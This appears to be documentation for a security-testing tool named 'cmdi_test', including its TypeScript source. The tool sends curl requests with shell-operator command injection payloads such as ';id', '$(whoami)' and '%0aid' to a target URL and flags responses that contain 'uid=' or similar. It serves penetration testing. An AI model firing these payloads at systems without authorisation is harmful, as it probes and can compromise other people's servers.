cmdi_test
Test web applications for command injection vulnerabilities by sending payloads with common shell operators to detect insecure parameter processing.
Instructions
Test command injection using various shell operators. Tests ;, &&, ||, |, backtick, $(), and %0a (newline) operators with 'id' and 'whoami' as detection commands. Returns results array with operator, payload, status, output_snippet, likely_vulnerable. Side effects: Read-only detection commands (id, whoami). Sends ~14 requests.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Target URL that processes the parameter server-side | |
| parameter | Yes | Vulnerable parameter name, e.g. 'storeId' | |
| base_value | No | Legitimate value for the parameter, e.g. '1' | |
| method | No | HTTP method | |
| operators | No | Injection operators to test. Default: all common operators. |
Implementation Reference
- src/tools/cmdi.ts:22-97 (handler)The handler function for the 'cmdi_test' tool. It executes command injection tests using common shell operators and detection commands.
async ({ url, parameter, base_value = "1", method = "POST", operators }) => { requireTool("curl"); const defaultOperators = [";", "&&", "||", "|", "`", "$()", "%0a"]; const testOperators = operators ?? defaultOperators; const detectionCommands: Record<string, string[]> = { ";": [`${base_value};id`, `${base_value};whoami`], "&&": [`${base_value}&&id`, `${base_value}&&whoami`], "||": [`${base_value}||id`, `invalid||whoami`], "|": [`${base_value}|id`, `${base_value}|whoami`], "`": [`${base_value}\`id\``, `${base_value}\`whoami\``], "$()": [`${base_value}$(id)`, `${base_value}$(whoami)`], "%0a": [`${base_value}%0aid`, `${base_value}%0awhoami`], }; const results = []; for (const op of testOperators) { if (!(op in detectionCommands)) { continue; } for (const payload of detectionCommands[op]) { let curlArgs: string[]; if (method === "GET") { curlArgs = [ "-sk", "-o", "-", "-w", "\n__STATUS__%{http_code}", `${url}?${parameter}=${payload}`, ]; } else { curlArgs = [ "-sk", "-o", "-", "-w", "\n__STATUS__%{http_code}", "-X", "POST", "-d", `${parameter}=${payload}`, url, ]; } const res = await runCmd("curl", curlArgs); let body = res.stdout; const statusMarker = body.lastIndexOf("__STATUS__"); let status = 0; if (statusMarker !== -1) { try { status = parseInt(body.slice(statusMarker + 10).trim(), 10); } catch { // leave status as 0 } body = body.slice(0, statusMarker); } // Check for command output indicators const indicators = ["uid=", "gid=", "root", "www-data", "nobody", "apache", "nginx"]; const likely = indicators.some((ind) => body.toLowerCase().includes(ind)); results.push({ operator: op, payload, status, output_snippet: body.slice(0, 300), likely_vulnerable: likely, }); } } const vulnerableOps = [...new Set(results.filter((r) => r.likely_vulnerable).map((r) => r.operator))]; const result = { results, vulnerable_operators: vulnerableOps, vulnerable: vulnerableOps.length > 0, }; return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] }; } - src/tools/cmdi.ts:12-21 (registration)The registration of the 'cmdi_test' tool.
server.tool( "cmdi_test", "Test command injection using various shell operators. Tests ;, &&, ||, |, backtick, $(), and %0a (newline) operators with 'id' and 'whoami' as detection commands. Returns results array with operator, payload, status, output_snippet, likely_vulnerable. Side effects: Read-only detection commands (id, whoami). Sends ~14 requests.", { url: z.string().describe("Target URL that processes the parameter server-side"), parameter: z.string().describe("Vulnerable parameter name, e.g. 'storeId'"), base_value: z.string().optional().describe("Legitimate value for the parameter, e.g. '1'"), method: z.enum(["GET", "POST"]).optional().describe("HTTP method"), operators: z.array(z.string()).optional().describe("Injection operators to test. Default: all common operators."), },